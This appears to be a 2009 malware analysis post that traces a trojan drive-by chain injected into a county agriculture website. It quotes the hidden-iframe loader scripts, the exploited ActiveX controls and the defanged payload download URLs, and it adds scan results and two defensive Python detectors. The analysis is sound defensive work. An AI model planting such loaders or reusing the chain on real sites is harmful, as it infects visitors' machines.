A county agriculture website injected with a trojan: Trojan.Win32.KillAV.bca / Trojan-Downloader.Win32.Geral.ix
Original by endurer
2009-05-05, version 1
On opening a county agriculture website, Maxthon prompted me to install an ActiveX control.
Inspecting the page source revealed:
/---
<script src=hxxp://***.w**vg0**.cn></script>
---/
#1 hxxp://***.w**vg0**.cn contains the code:
/---
if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<div style='display:none'>")
document.write("<iframe src=hxxp://er**.d**ry*63.cn/1*/2**0/index.htm></iframe>")
document.write("</div>")}
---/
Its function: check the current URL; if it contains the string "gov", do nothing; otherwise write out the code:
/---
<iframe src=hxxp://er**.d**ry*63.cn/1*/2**0/index.htm></iframe>
---/
#1.1 hxxp://er**.d**ry*63.cn/1*/2**0/index.htm contains the code:
/---
<iframe src=index2.htm width=100 height=0></Iframe>
---/
#1.1.1 hxxp://er**.d**ry*63.cn/1*/2**0/index2.htm contains the code:
/---
<iframe src=ccqm.htm width=100 height=0></iframe>
<script src="js.css"></script>
---/
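The injection chain in #1, #1.1 and #1.1.1 uses three recognisable patterns: an iframe wrapped in a `display:none` div, iframes with `height=0`, and JavaScript served from a `.css` path. The scanner below, an added example written for this page rather than code from the original post, flags those patterns, plus `document.write` of an iframe and the URL-conditional "gov" check, in fetched HTML. The sample page is constructed and its hostnames are placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed sample HTML (not captured from the real site) reproducing the
# patterns seen in #1, #1.1 and #1.1.1: a hidden div wrapping an iframe, a
# zero-height iframe, a script loaded from a ".css" path, and the "gov" check.
# Hostnames are placeholders. The last iframe and app.js are benign controls.
SAMPLE_HTML = """
<html><body>
<h1>County Agriculture Network</h1>
<div style='display:none'>
<iframe src=http://exploit.example/1/2/index.htm></iframe>
</div>
<iframe src=index2.htm width=100 height=0></Iframe>
<script src="js.css"></script>
<script src="/static/app.js"></script>
<iframe src="https://maps.example/embed" width=600 height=400></iframe>
<script>
if(document.location.href.indexOf("gov")>=0)
{} else {document.write("<iframe src=http://exploit.example/x.htm></iframe>")}
</script>
</body></html>
"""

_WRITE_IFRAME = re.compile(r"document\.write\s*\(.*?<iframe", re.I | re.S)
_URL_CHECK = re.compile(r"location\.href\.indexOf\s*\(", re.I)


def _px(value):
    """Parse a width/height attribute ("0", "0px", "100%") to an int, or None."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings for the drive-by patterns above."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._hidden = []        # stack: True for each open div/span with display:none
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        hidden_style = "display:none" in style or "visibility:hidden" in style
        if tag in ("div", "span"):
            self._hidden.append(hidden_style)
        elif tag == "iframe":
            w, h = _px(a.get("width")), _px(a.get("height"))
            if any(self._hidden) or hidden_style or w == 0 or h == 0:
                self.findings.append(("hidden_iframe", a.get("src", "")))
        elif tag == "script":
            src = a.get("src")
            if src:
                # Script served from a path that is not .js (js.css, 14.css, ...)
                if not src.split("?", 1)[0].lower().endswith(".js"):
                    self.findings.append(("script_non_js_src", src))
            else:
                self._in_script = True
                self._script_buf = []

    def handle_endtag(self, tag):
        if tag in ("div", "span") and self._hidden:
            self._hidden.pop()
        elif tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            if _WRITE_IFRAME.search(body):
                self.findings.append(("document_write_iframe", body.strip()[:60]))
            if _URL_CHECK.search(body):
                self.findings.append(("url_conditional_evasion", body.strip()[:60]))

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)


def scan_html(html):
    """Return the list of (kind, detail) findings for one page, in document order."""
    scanner = InjectionScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_HTML):
        print(f"{kind:26s} {detail}")
```

Run it against the HTML you fetch from a suspect page (with `hxxp` de-fanged URLs restored) rather than against the rendered DOM; the first-stage script only emits the iframe when the URL does not contain "gov", so a dynamic check from the wrong origin sees nothing.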
#1.1.1.1 hxxp://er**.d**ry*63.cn/1*/2**0/ccqm.htm
Exploits the vulnerability in the control with clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365 to download hxxp://w*w1.u**ws**3y.com/**1/ActivcX.exe
File specifier : D:/test/ActivcX.exe
Attributes : A---
Digital signature: Microsoft Windows
PE file: Yes
Language : Chinese (China)
File version : 1, 0, 0, 1
Copyright : Copyright © 2008
Product version : 1, 0, 0, 1
Created : 2009-5-5 9:33:34
Modified : 2009-5-5 9:33:34
Size : 43016 bytes (42.8 KB)
MD5 : 614a7b4f6c23783d463c681e46a5735f
SHA1: DD8BB584C4D4915993E57E69A8F8C0E0DABDC59E
CRC32: 3371c540
File ActivcX.exe received on 2009.05.05 03:35:13 (CET)
Antivirus engine | Version | Last update | Scan result |
a-squared | 4.0.0.101 | 2009.05.05 | Trojan.Win32.AntiAV!IK |
AhnLab-V3 | 5.0.0.2 | 2009.05.04 | - |
AntiVir | 7.9.0.160 | 2009.05.04 | TR/Killav.PN |
Antiy-AVL | 2.0.3.1 | 2009.04.30 | - |
Authentium | 5.1.2.4 | 2009.05.04 | - |
Avast | 4.8.1335.0 | 2009.05.04 | Win32:Rootkit-gen |
AVG | 8.5.0.327 | 2009.05.04 | - |
BitDefender | 7.2 | 2009.05.04 | - |
CAT-QuickHeal | 10.00 | 2009.05.04 | - |
ClamAV | 0.94.1 | 2009.05.04 | - |
Comodo | 1149 | 2009.05.03 | - |
DrWeb | 4.44.0.09170 | 2009.05.05 | - |
eSafe | 7.0.17.0 | 2009.05.03 | Suspicious File |
eTrust-Vet | 31.6.6489 | 2009.05.05 | Win32/Dogrobot.V |
F-Prot | 4.4.4.56 | 2009.05.04 | - |
F-Secure | 8.0.14470.0 | 2009.05.04 | - |
Fortinet | 3.117.0.0 | 2009.05.04 | - |
GData | 19 | 2009.05.05 | - |
Ikarus | T3.1.1.49.0 | 2009.05.05 | Trojan.Win32.AntiAV |
K7AntiVirus | 7.10.723 | 2009.05.04 | - |
Kaspersky | 7.0.0.125 | 2009.05.05 | - |
McAfee | 5605 | 2009.05.04 | - |
McAfee+Artemis | 5605 | 2009.05.04 | - |
McAfee-GW-Edition | 6.7.6 | 2009.05.04 | Trojan.Killav.PN |
Microsoft | 1.4602 | 2009.05.04 | Trojan:Win32/Dogrobot.I |
NOD32 | 4052 | 2009.05.04 | a variant of Win32/AntiAV.NAC |
Norman | 6.01.05 | 2009.05.04 | - |
nProtect | 2009.1.8.0 | 2009.05.04 | - |
Panda | 10.0.0.14 | 2009.05.04 | - |
PCTools | 4.4.2.0 | 2009.05.03 | - |
Prevx1 | 3.0 | 2009.05.05 | - |
Rising | 21.28.04.00 | 2009.05.04 | - |
Sophos | 4.41.0 | 2009.05.05 | - |
Sunbelt | 3.2.1858.2 | 2009.05.04 | BehavesLike.Win32.Malware (v) |
Symantec | 1.4.4.12 | 2009.05.05 | Downloader |
TheHacker | 6.3.4.1.318 | 2009.05.04 | - |
TrendMicro | 8.950.0.1092 | 2009.05.04 | Possible_Mlwr-13 |
VBA32 | 3.12.10.4 | 2009.05.04 | suspected of Win32.BrokenEmbeddedSignature (paranoid heuristics) |
ViRobot | 2009.5.4.1719 | 2009.05.04 | - |
VirusBuster | 4.6.5.0 | 2009.05.04 | - |
Additional information |
File size: 43016 bytes |
MD5...: 614a7b4f6c23783d463c681e46a5735f |
SHA1..: dd8bb584c4d4915993e57e69a8f8c0e0dabdc59e |
SHA256: 5860dca29a93c9d639822cdc94c63cf885e15ff211cd750d279a1fa1af9bacd1 |
SHA512: a74c18c29e0b8be5dc22c50858ec3fcfdcad1d9d4f6563975671469e0cb63347728addda34e40460edc3af512e800e0725b0b47a8d200b5c6d9e439f7032d286 |
ssdeep: 768:CpiAgpHguXnl7M/qMa9UybMlbzaLV8tveccjtL0k4x7Uvbj3ACmw0PWa:ARhuXnlcqMa9Vwlbkf9n4l0bj3ACml |
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser |
TrID..: File type identification
  UPX compressed Win32 Executable (39.5%)
  Win32 EXE Yoda's Crypter (34.3%)
  Win32 Executable Generic (11.0%)
  Win32 Dynamic Link Library (generic) (9.8%)
  Generic Win/DOS Executable (2.5%) |
PEInfo: PE Structure information
  ( base data )
  entrypointaddress.: 0x1b1b0
  timedatestamp.....: 0x49fdbdd7 (Sun May 03 15:52:55 2009)
  machinetype.......: 0x14c (I386)
  ( 3 sections )
  name   viradd   virsiz   rawdsiz  ntrpy  md5
  UPX0   0x1000   0x11000  0x0      0.00   d41d8cd98f00b204e9800998ecf8427e
  UPX1   0x12000  0xa000   0x9400   7.91   01a9e9405e16934a2a5850ffabb5e036
  .rsrc  0x1c000  0x1000   0x600    2.78   c2fbafde5b8e544a6ad8f2e28ebda2c0
  ( 2 imports )
  > KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
  > USER32.dll: wsprintfA
  ( 0 exports ) |
PDFiD.: - |
RDS...: NSRL Reference Data Set - |
packers (Kaspersky): PE_Patch.UPX, UPX |
packers (Avast): UPX |
packers (F-Prot): UPX |
http://bbs.ikaka.com//showtopic-8621775.aspx
Reply: ActivcX.exe——614a7b4f6c23783d463c681e46a5735f
Posted: 2009-05-05 10:19
Filename: ActivcX.exe
Virus name: Trojan.Win32.KillAV.bca
The virus file you reported will be handled in Rising 2009 version 21.28.11; under special circumstances it may be postponed by a few versions.
Subject: RE: ActivcX.exe——614a7b4f6c23783d463c681e46a5735f [KLAN-27689534]
From: newvirus@kaspersky.com
Date: 2009-5-5 10:42:38
Hello,
ActivcX.exe - Trojan-Downloader.Win32.Geral.ix
New malicious software was found in this file. Its detection will be included in the next update.
Thank you for your help.
-----------------
Regards, Vitaly Butuzov
Virus Analyst, Kaspersky Lab.
#1.1.1.2 hxxp://er**.d**ry*63.cn/1*/2**0/js.css
Writes out the code:
/---
<iframe width=100 height=0 src=hk14.htm></iframe>
<iframe width=100 height=0 src=hkfl.htm></iframe>
<iframe width=100 height=0 src=hkvod.htm></iframe>
<iframe width=50 height=0 src=hkbb.htm></iframe>
<iframe src=hkxxz.htm width=100 height=0></iframe>
<iframe width=50 height=0 src=hkff.htm></iframe>
<iframe width=100 height=0 src=hk122121.htm></iframe>
---/
#1.1.1.2.1 hxxp://er**.d**ry*63.cn/1*/2**0/hk14.htm contains the code:
/---
<script src=14.css></script>
<script src=15.css></script>
<script src=16.css></script>
---/
and exploits the MS06-014 vulnerability to download hxxp://w*w1.u**ws**3y.com/**1/cX.exe, creating baidueee.vbs to run it.
2009-5-5 9:49:09 hxxp://w*w1.u**ws**3y.com/**1/cX.exe//# HttpRead 检测到威胁: Trojan-Downloader.Win32.Geral.if
File specifier : D:/test/cX.exe
Attributes : A---
Digital signature: No
PE file: Yes
Language : Chinese (China)
File version : 1, 0, 0, 1
Copyright : Copyright © 2008
Product version : 1, 0, 0, 1
Created : 2009-5-5 9:50:17
Modified : 2009-5-5 9:50:17
Size : 40448 bytes (39.512 KB)
MD5 : b1238d558b393d2688072a2400aedcc2
SHA1: E59D4779418EA92E208797518FC78DA8D996B692
CRC32: 8a02509a
File cX.exe received on 2009.05.05 03:50:43 (CET)
Antivirus engine | Version | Last update | Scan result |
a-squared | 4.0.0.101 | 2009.05.05 | Trojan.Win32.AntiAV!IK |
AhnLab-V3 | 5.0.0.2 | 2009.05.04 | - |
AntiVir | 7.9.0.160 | 2009.05.04 | TR/Killav.PN |
Antiy-AVL | 2.0.3.1 | 2009.04.30 | - |
Authentium | 5.1.2.4 | 2009.05.04 | - |
Avast | 4.8.1335.0 | 2009.05.04 | Win32:Rootkit-gen |
AVG | 8.5.0.327 | 2009.05.04 | - |
BitDefender | 7.2 | 2009.05.04 | Gen:Trojan.Heur.2014755353 |
CAT-QuickHeal | 10.00 | 2009.05.04 | - |
ClamAV | 0.94.1 | 2009.05.04 | - |
Comodo | 1149 | 2009.05.03 | - |
DrWeb | 4.44.0.09170 | 2009.05.05 | - |
eSafe | 7.0.17.0 | 2009.05.03 | Suspicious File |
eTrust-Vet | 31.6.6489 | 2009.05.05 | Win32/Dogrobot.V |
F-Prot | 4.4.4.56 | 2009.05.04 | - |
F-Secure | 8.0.14470.0 | 2009.05.04 | - |
Fortinet | 3.117.0.0 | 2009.05.04 | - |
GData | 19 | 2009.05.05 | Gen:Trojan.Heur.2014755353 |
Ikarus | T3.1.1.49.0 | 2009.05.05 | Trojan.Win32.AntiAV |
K7AntiVirus | 7.10.723 | 2009.05.04 | - |
Kaspersky | 7.0.0.125 | 2009.05.05 | - |
McAfee | 5605 | 2009.05.04 | - |
McAfee+Artemis | 5605 | 2009.05.04 | Artemis!B1238D558B39 |
McAfee-GW-Edition | 6.7.6 | 2009.05.04 | Trojan.Killav.PN |
Microsoft | 1.4602 | 2009.05.04 | Trojan:Win32/Dogrobot.I |
NOD32 | 4052 | 2009.05.04 | a variant of Win32/AntiAV.NAC |
Norman | 6.01.05 | 2009.05.04 | - |
nProtect | 2009.1.8.0 | 2009.05.04 | - |
Panda | 10.0.0.14 | 2009.05.04 | Suspicious file |
PCTools | 4.4.2.0 | 2009.05.03 | - |
Prevx1 | 3.0 | 2009.05.05 | Medium Risk Malware |
Rising | 21.28.04.00 | 2009.05.04 | - |
Sophos | 4.41.0 | 2009.05.05 | Mal/PWS-Fam |
Sunbelt | 3.2.1858.2 | 2009.05.04 | BehavesLike.Win32.Malware (v) |
Symantec | 1.4.4.12 | 2009.05.05 | Downloader |
TheHacker | 6.3.4.1.318 | 2009.05.04 | - |
TrendMicro | 8.950.0.1092 | 2009.05.04 | Possible_Mlwr-13 |
VBA32 | 3.12.10.4 | 2009.05.04 | - |
ViRobot | 2009.5.4.1719 | 2009.05.04 | - |
VirusBuster | 4.6.5.0 | 2009.05.04 |
Additional information |
File size: 40448 bytes |
MD5...: b1238d558b393d2688072a2400aedcc2 |
SHA1..: e59d4779418ea92e208797518fc78da8d996b692 |
SHA256: bd7c58dd6fffc7c3e073e85e7ab1b0070d0976665df1e5c64d8307f8336b2867 |
SHA512: 460b6261f52d29793b9a47aa7c3bd88f32732716027d5ad48246a847875833f1212aafba066a8325760a383304c3b52847dad6d18360333dfcc29484a2be7599 |
ssdeep: 768:ZpiAgpHguXnl7M/qMa9UybMlbzaLV8tveccjtL0k4x7Uvbj3AC:vRhuXnlcqMa9Vwlbkf9n4l0bj3AC |
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser |
TrID..: File type identification
  UPX compressed Win32 Executable (39.5%)
  Win32 EXE Yoda's Crypter (34.3%)
  Win32 Executable Generic (11.0%)
  Win32 Dynamic Link Library (generic) (9.8%)
  Generic Win/DOS Executable (2.5%) |
PEInfo: PE Structure information
  ( base data )
  entrypointaddress.: 0x1b1b0
  timedatestamp.....: 0x49fdbdd7 (Sun May 03 15:52:55 2009)
  machinetype.......: 0x14c (I386)
  ( 3 sections )
  name   viradd   virsiz   rawdsiz  ntrpy  md5
  UPX0   0x1000   0x11000  0x0      0.00   d41d8cd98f00b204e9800998ecf8427e
  UPX1   0x12000  0xa000   0x9400   7.91   01a9e9405e16934a2a5850ffabb5e036
  .rsrc  0x1c000  0x1000   0x600    2.78   c2fbafde5b8e544a6ad8f2e28ebda2c0
  ( 2 imports )
  > KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
  > USER32.dll: wsprintfA
  ( 0 exports ) |
PDFiD.: - |
RDS...: NSRL Reference Data Set - |
packers (Kaspersky): PE_Patch.UPX, UPX |
packers (Avast): UPX |
http://info.prevx.com/aboutprogramtext.asp?PX5=4949059600D505AE9EA000B8E880E10042A80038 |
packers (F-Prot): UPX |
http://bbs.ikaka.com//showtopic-8621768.aspx
Reply: cX.exe——b1238d558b393d2688072a2400aedcc2
Posted: 2009-05-05 14:21
Filename: cX.exe
Virus name: Trojan.Win32.KillAV.bca
The virus file you reported will be handled in Rising 2009 version 21.28.11; under special circumstances it may be postponed by a few versions.
#1.1.1.2.2 hxxp://er**.d**ry*63.cn/1*/2**0/hkfl.htm detects the browser type; if it is IE, it writes out:
/---
<iframe src=cc11.htm width=100% height=100% scrolling=no frameborder=0>
---/
If it is Firefox, it writes out:
/---
<iframe src=cc22.htm width=100% height=100% scrolling=no frameborder=0>
---/
Otherwise it writes out:
/---
<iframe src=cc11.htm width=100% height=100% scrolling=no frameborder=0>
---/
#1.1.1.2.2.1 hxxp://er**.d**ry*63.cn/1*/2**0/cc11.htm
Exploits a Flash player plugin vulnerability to download ci115.swf, ci47.swf, ci45.swf, ci64.swf or ci28.swf.
#1.1.1.2.2.2 hxxp://er**.d**ry*63.cn/1*/2**0/cc22.htm
Exploits a Flash player plugin vulnerability to download cf115.swf, cf47.swf, cf45.swf, cf64.swf or cf28.swf.
#1.1.1.2.2.3 hxxp://er**.d**ry*63.cn/1*/2**0/hkvod.htm includes the code:
/---
<script src="ccvod.css"></script>
<script src="b.css"></script>
<script src="d.css"></script>
---/
Exploits the QVOD player (clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF) vulnerability to download hxxp://w*w1.u**ws**3y.com/**1/cX.exe
#1.1.1.2.4 hxxp://er**.d**ry*63.cn/1*/2**0/hkbb.htm includes the code:
/---
<script src="bff1.css"></script>
<script src="bff.css"></script>
---/
Exploits the Baofeng (暴风影音) media player (clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB) vulnerability to download hxxp://w*w1.u**ws**3y.com/**1/cX.exe
#1.1.1.2.5 hxxp://er**.d**ry*63.cn/1*/2**0/hkxxz.htm includes the code:
/---
<script src="091.css"></script>
<script src="092.css"></script>
---/
To be analyzed.
#1.1.1.2.6 hxxp://er**.d**ry*63.cn/1*/2**0/hkff.htm includes:
/---
<script src="ff.css"></script>
---/
Exploits the Microsoft Access Snapshot Viewer (snpvw.Snapshot Viewer Control.1, clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9) vulnerability to download hxxp://w*w1.u**ws**3y.com/**1/cX.exe, saving it as C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe (the All Users Start Menu Startup folder).
#1.1.1.2.7 hxxp://er**.d**ry*63.cn/1*/2**0/hk122121.htm includes:
/---
<script src="Turl.css"></script>
<script src="real.css"></script>
<script src="real1.css"></script>
---/
Exploits the RealPlayer (clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA) vulnerability to download hxxp://w*w1.u**ws**3y.com/**1/cX.exe, saving it as C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe (the All Users Start Menu Startup folder).
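Every exploit page in this chain (#1.1.1.1, #1.1.1.2.2.3, #1.1.1.2.4, #1.1.1.2.6 and #1.1.1.2.7) targets a specific ActiveX control identified by CLSID or ProgID. The script below, an added example for this page and not code from the original post, pulls CLSID and `ActiveXObject` ProgID references out of page text, matches them against the controls named in this analysis, and renders a `.reg` file that sets the Internet Explorer kill bit for the flagged CLSIDs (Compatibility Flags = 0x400 under the ActiveX Compatibility key, which stops IE from instantiating the control). The sample page is constructed, and its `DEADBEEF-...` CLSID is a made-up benign control; the product names come from the analysis above, except that the page does not name the control behind the first CLSID.

```python
import re

# CLSIDs and ProgIDs referenced in the exploit pages above, with the product the
# analysis attributes to each. The control behind the first CLSID is not named
# on the page.
KNOWN_VULNERABLE_CLSIDS = {
    "19EFFC12-25FB-479A-A0F2-1569AE1B3365": "unnamed control (#1.1.1.1)",
    "F3D0D36F-23F8-4682-A195-74C92B03D4AF": "QVOD player",
    "6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB": "Baofeng player",
    "F0E42D50-368C-11D0-AD81-00A0C90DC8D9": "Microsoft Access Snapshot Viewer",
    "CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA": "RealPlayer",
}
KNOWN_VULNERABLE_PROGIDS = {
    "snpvw.Snapshot Viewer Control.1": "Microsoft Access Snapshot Viewer",
}

# clsid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX, with or without braces, any case
_CLSID_RE = re.compile(
    r"clsid:\s*\{?([0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12})\}?", re.I)
# new ActiveXObject("ProgID")
_PROGID_RE = re.compile(r"ActiveXObject\s*\(\s*['\"]([^'\"]+)['\"]", re.I)

# Constructed sample (not captured from the real exploit kit): two of the CLSIDs
# above in object tags, the Snapshot Viewer ProgID instantiated from script, and
# one made-up CLSID that must not be flagged.
SAMPLE_PAGE = """
<object classid="clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF" id="qvod"></object>
<object classid="CLSID:{cfcdaa03-8be4-11cf-b84b-0020afbbccfa}" id="real"></object>
<object classid="clsid:DEADBEEF-0000-4000-8000-000000000001" id="benign"></object>
<script>var snap = new ActiveXObject("snpvw.Snapshot Viewer Control.1");</script>
"""


def extract_controls(text):
    """Return (clsids, progids) referenced in page text; CLSIDs are upper-cased."""
    clsids = sorted({m.upper() for m in _CLSID_RE.findall(text)})
    progids = sorted(set(_PROGID_RE.findall(text)))
    return clsids, progids


def flag_known_vulnerable(text):
    """Map each referenced control that is in the lists above to its product name."""
    clsids, progids = extract_controls(text)
    flagged = {c: KNOWN_VULNERABLE_CLSIDS[c] for c in clsids
               if c in KNOWN_VULNERABLE_CLSIDS}
    flagged.update({p: KNOWN_VULNERABLE_PROGIDS[p] for p in progids
                    if p in KNOWN_VULNERABLE_PROGIDS})
    return flagged


def killbit_reg(clsids):
    """Render a .reg file that sets the IE kill bit (0x400) for each CLSID.

    This is the standard mitigation for a vulnerable control that cannot be
    removed or patched immediately; it only affects Internet Explorer hosting.
    """
    lines = ["Windows Registry Editor Version 5.00", ""]
    for c in clsids:
        lines.append(r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
                     r"\ActiveX Compatibility\{%s}]" % c.upper())
        lines.append('"Compatibility Flags"=dword:00000400')
        lines.append("")
    return "\n".join(lines)


if __name__ == "__main__":
    hits = flag_known_vulnerable(SAMPLE_PAGE)
    for ident, product in hits.items():
        print(f"{ident:40s} {product}")
    print(killbit_reg([c for c in hits if c in KNOWN_VULNERABLE_CLSIDS]))
```

The kill bit blocks the control only inside Internet Explorer; the affected players and the Snapshot Viewer still need to be updated or removed, and the `js.css`-style loaders in this chain should be matched by the hidden-iframe scanner rather than by CLSID.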